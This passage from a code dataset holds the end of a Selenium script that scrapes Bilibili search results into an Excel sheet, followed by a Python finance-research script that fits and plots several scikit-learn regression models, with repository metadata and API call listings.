\"#nav_searchform > input\")))\n submit = WAIT.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#nav_searchform > div > button')))\n\n input.send_keys(src)\n submit.click()\n\n print(\"搜索成功,转到新窗口\")\n all_h = browser.window_handles\n browser.switch_to.window(all_h[1])\n getPage()\n\n total = WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.last > button'))).text\n print('总页数为' + total)\n return int(total)\n except TimeoutException:\n print('访问超时,尝试重新访问...')\n return search()\n\n def getPage():\n WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#all-list > div.flow-loader > div.filter-wrap')))\n html = browser.page_source\n soup = bs4.BeautifulSoup(html, 'lxml')\n save_data_to_excel(soup)\n\n def save_data_to_excel(soup):\n list = soup.find(class_='video-list clearfix').find_all(class_='video-item matrix')\n for item in list:\n item_title = item.find('a').get('title')\n item_link = item.find('a').get('href')\n item_des = item.find(class_='des hide').text.strip()\n item_playtime = 
item.find(class_='so-icon watch-num').text.strip()\n if item_playtime.endswith('万'):\n item_playtime=float(item_playtime[:-1])*1000\n item_playtime=int(item_playtime)\n item_subtitle = item.find(class_='so-icon hide').text.strip()\n if item_subtitle.endswith('万'):\n item_subtitle=float(item_subtitle[:-1])*1000\n item_subtitle=int(item_subtitle)\n item_time = item.find(class_='so-icon time').text.strip()\n item_up = item.find(class_='up-name').text\n\n print(\"读取 | \" + item_title)\n nonlocal n\n\n sheet.write(n, 0, item_title)\n sheet.write(n, 1, item_link)\n sheet.write(n, 2, item_des)\n sheet.write(n, 3, item_playtime)\n sheet.write(n, 4, item_subtitle)\n sheet.write(n, 5, item_time)\n sheet.write(n, 6, item_up)\n\n n += 1\n\n def next_page(des_page):\n try:\n print('读取下一页...')\n next_btn = WAIT.until(EC.element_to_be_clickable((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.next > button')))\n next_btn.click()\n WAIT.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.active > button'),\n str(des_page)))\n getPage()\n except TimeoutException:\n print('访问超时,尝试刷新中...')\n browser.refresh()\n next_page(des_page)\n\n total = search()\n\n for i in range(2, total + 1):\n next_page(i)\n\n browser.close()\n\n # 保存表格(仅用于表格存储时)\n book.save(src+'.xls')\n\nif __name__ =='__main__':\n src=input(\"请输入要搜索的内容:\")\n searchB(src)", "repo_name": "jingjiecb/PythonSpider", "sub_path": "learn/selenium/bilibili.py", "file_name": "bilibili.py", "file_ext": "py", "file_size_in_byte": 4575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 14, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 53, 
"usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 58, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 58, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 58, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 60, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 96, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 96, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 96, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 96, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.text_to_be_present_in_element", "line_number": 99, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 99, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "31314452787", "text": "import sys, datetime, pdb, time\nsys.path.append(\"/usr/lib/python3/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nsys.path.append(\"/home/ubuntu/workspace/ml_dev_work\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import cross_val_score, train_test_split\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.linear_model import LinearRegression, RANSACRegressor\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import Ridge, ElasticNet, Lasso\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom utils.ml_utils import plot_decision_regions, standardize, IMG_PATH, lin_regplot\nfrom algorithms.linear_regression_gd import LinearRegressionGD\n\n\n\ndef heat_map(df, xcols):\n y = df['target']\n X = df[list(xcols)]\n cols = ['target_proxy'] + list(xcols)\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n sns.set(style='whitegrid', context='notebook') \n sns.pairplot(df[cols], size=2.5) \n plt.tight_layout() \n plt.savefig(IMG_PATH + 'corr_mat.png', dpi=300)\n plt.close()\n \n cm = np.corrcoef(df[cols].values.T)\n sns.set(font_scale=1.5)\n hm = sns.heatmap(cm, \n cbar=True,\n annot=True, \n square=True,\n fmt='.2f',\n annot_kws={'size': 15},\n yticklabels=cols,\n xticklabels=cols)\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'heat_map.png', dpi=300)\n plt.close()\n \ndef linear_regressor(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, 
test_size=ts, random_state=0)\n \n lr = LinearRegressionGD()\n lr.fit(np.transpose(np.array([X_train])), y_train)\n plt.plot(range(1, lr.n_iter+1), lr.cost_)\n plt.ylabel('SSE')\n plt.xlabel('Epoch')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'cost.png', dpi=300)\n plt.close()\n \n lin_regplot(np.transpose(np.array([X_train])), y_train, lr)\n plt.savefig(IMG_PATH + 'lin_reg_cost.png', dpi=300)\n plt.close()\n \n # Find the average return of a stock with PE = 20\n # Note: will give odd results if x values are standardized and input is not\n y_val_std = lr.predict([20.0])\n print(\"Estimated Return: %.3f\" % y_val_std)\n print('Slope: %.3f' % lr.w_[1])\n print('Intercept: %.3f' % lr.w_[0])\n\ndef linear_regression_sklearn(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n X = np.transpose(np.array([X])) \n slr = LinearRegression()\n slr.fit(X, y.values)\n y_pred = slr.predict(X)\n print('Slope: %.3f' % slr.coef_[0])\n print('Intercept: %.3f' % slr.intercept_)\n \n lin_regplot(X, y.values, slr)\n plt.xlabel('x val')\n plt.ylabel('Return')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'scikit_lr_fit.png', dpi=300)\n plt.close()\n\n # Closed-form solution\n Xb = np.hstack((np.ones((X.shape[0], 1)), X))\n w = np.zeros(X.shape[1])\n z = np.linalg.inv(np.dot(Xb.T, Xb))\n w = np.dot(z, np.dot(Xb.T, y))\n print('Slope: %.3f' % w[1])\n print('Intercept: %.3f' % w[0])\n \ndef ransac(df, xcols):\n # function to deal with outliers\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n ransac = RANSACRegressor(LinearRegression(), \n max_trials=100, \n min_samples=50, \n residual_metric=lambda x: np.sum(np.abs(x), axis=1), \n residual_threshold=5.0, \n random_state=0)\n \n ransac.fit(X, y)\n inlier_mask = ransac.inlier_mask_\n outlier_mask = np.logical_not(inlier_mask)\n line_X = np.arange(3, 10, 1)\n line_y_ransac = ransac.predict(line_X[:, np.newaxis])\n plt.scatter(X[inlier_mask], y[inlier_mask], c='blue', marker='o', label='Inliers')\n plt.scatter(X[outlier_mask], y[outlier_mask], c='lightgreen', marker='s', label='Outliers')\n plt.plot(line_X, line_y_ransac, color='red') \n plt.xlabel('x-val')\n plt.ylabel('Returns')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'ransac_fit.png', dpi=300)\n plt.close()\n \ndef polynomial_regression(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n lr = LinearRegression()\n pr = LinearRegression()\n quadratic = PolynomialFeatures(degree=2)\n X_quad = quadratic.fit_transform(X)\n # fit linear features\n lr.fit(X, y)\n X_fit = np.arange(-2,50,1)[:, np.newaxis]\n y_lin_fit = lr.predict(X_fit)\n \n # fit quadratic features\n pr.fit(X_quad, y)\n y_quad_fit = pr.predict(quadratic.fit_transform(X_fit))\n \n # plot results\n plt.scatter(X, y.values, label='training points')\n plt.plot(X_fit, y_lin_fit, label='linear fit', linestyle='--')\n plt.plot(X_fit, y_quad_fit, label='quadratic 
fit')\n plt.legend(loc='best')\n \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'poly_regression.png', dpi=300)\n plt.close()\n \n y_lin_pred = lr.predict(X)\n y_quad_pred = pr.predict(X_quad)\n print('Training MSE linear: %.3f, quadratic: %.3f' % ( \n mean_squared_error(y, y_lin_pred), \n mean_squared_error(y, y_quad_pred))) \n print('Training R^2 linear: %.3f, quadratic: %.3f' % ( \n r2_score(y, y_lin_pred), \n r2_score(y, y_quad_pred)))\n\ndef nonlinear(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n regr = LinearRegression() \n \n # create quadratic features \n quadratic = PolynomialFeatures(degree=2) \n cubic = PolynomialFeatures(degree=3) \n X_quad = quadratic.fit_transform(X) \n X_cubic = cubic.fit_transform(X) \n \n # fit features \n X_fit = np.arange(X.min(), X.max(), 1)[:, np.newaxis] \n \n regr = regr.fit(X, y) \n y_lin_fit = regr.predict(X_fit) \n linear_r2 = r2_score(y, regr.predict(X)) \n \n regr = regr.fit(X_quad, y) \n y_quad_fit = regr.predict(quadratic.fit_transform(X_fit)) \n quadratic_r2 = r2_score(y, regr.predict(X_quad)) \n \n regr = regr.fit(X_cubic, y) \n y_cubic_fit = regr.predict(cubic.fit_transform(X_fit)) \n cubic_r2 = r2_score(y, regr.predict(X_cubic)) \n \n \n # plot results \n plt.scatter(X, y, label='training points', color='lightgray') \n \n plt.plot(X_fit, y_lin_fit, \n label='linear (d=1), $R^2=%.2f$' % linear_r2, \n color='blue', \n lw=2, \n linestyle=':') \n \n plt.plot(X_fit, y_quad_fit, \n label='quadratic (d=2), $R^2=%.2f$' % quadratic_r2, \n color='red', \n lw=2, \n linestyle='-') \n \n plt.plot(X_fit, y_cubic_fit, \n label='cubic (d=3), $R^2=%.2f$' % cubic_r2, \n color='green', \n lw=2, \n linestyle='--') \n \n plt.xlabel('x-val') \n plt.ylabel('Return') \n plt.legend(loc='best') \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'nonlinear_regr.png', dpi=300)\n plt.close()\n \n pdb.set_trace()\n # transform features\n X_log = np.log(X)\n y_sqrt = np.sqrt(y)\n \n # fit features\n X_fit = np.arange(X_log.min()-1, X_log.max()+1, 1)[:, np.newaxis]\n regr = regr.fit(X_log, y_sqrt)\n y_lin_fit = regr.predict(X_fit)\n linear_r2 = r2_score(y_sqrt, regr.predict(X_log))\n \n # plot results\n plt.scatter(X_log, y_sqrt, label='training points', color='lightgray')\n plt.plot(X_fit, y_lin_fit, \n label='linear (d=1), $R^2=%.2f$' % linear_r2, \n color='blue', \n lw=2)\n \n plt.xlabel('x-val')\n plt.ylabel('Return')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'sqrt_log.png', dpi=300)\n\ndef random_forest_regression(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n tree = DecisionTreeRegressor(max_depth=3)\n tree.fit(X, y)\n sort_idx = X.flatten().argsort()\n lin_regplot(X[sort_idx], y[sort_idx], tree)\n plt.xlabel('x-val')\n plt.ylabel('Return')\n plt.savefig(IMG_PATH + 'tree_regression.png', dpi=300)\n plt.close()\n \n forest = RandomForestRegressor(n_estimators=1000, \n criterion='mse', \n random_state=1, \n n_jobs=-1)\n forest.fit(X_train, y_train)\n y_train_pred = forest.predict(X_train)\n y_test_pred = forest.predict(X_test)\n print('MSE train: %.3f, test: 
%.3f' % (\n mean_squared_error(y_train, y_train_pred),\n mean_squared_error(y_test, y_test_pred)))\n print('R^2 train: %.3f, test: %.3f' % (\n r2_score(y_train, y_train_pred),\n r2_score(y_test, y_test_pred)))\n \n plt.scatter(y_train_pred, \n y_train_pred - y_train, \n c='black', \n marker='o', \n s=35, \n alpha=0.5, \n label='Training data') \n plt.scatter(y_test_pred, \n y_test_pred - y_test, \n c='lightgreen', \n marker='s', \n s=35, \n alpha=0.7, \n label='Test data') \n plt.xlabel('Predicted values') \n plt.ylabel('Residuals') \n plt.legend(loc='best') \n plt.hlines(y=0, xmin=-10, xmax=50, lw=2, color='red') \n plt.xlim([-10, 50]) \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'slr_residuals.png', dpi=300)", "repo_name": "mccarvik/python_for_finance", "sub_path": "research/ml_analysis/scripts/continuous_variables.py", "file_name": "continuous_variables.py", "file_ext": "py", "file_size_in_byte": 11348, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 7, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 35, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 37, "usage_type": "call"}, {"api_name": "seaborn.pairplot", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.corrcoef", "line_number": 43, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 44, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "utils.ml_utils.standardize", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 65, "usage_type": "call"}, 
{"api_name": "algorithms.linear_regression_gd.LinearRegressionGD", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.ml_utils.standardize", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": 
"numpy.linalg.inv", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 129, "usage_type": "call"}, {"api_name": "sklearn.linear_model.RANSACRegressor", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 142, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 159, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 164, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 170, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 178, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 190, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 191, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 205, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 207, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 210, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 216, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 220, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 224, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 
254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "pdb.set_trace", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 265, "usage_type": "attribute"}, {"api_name": 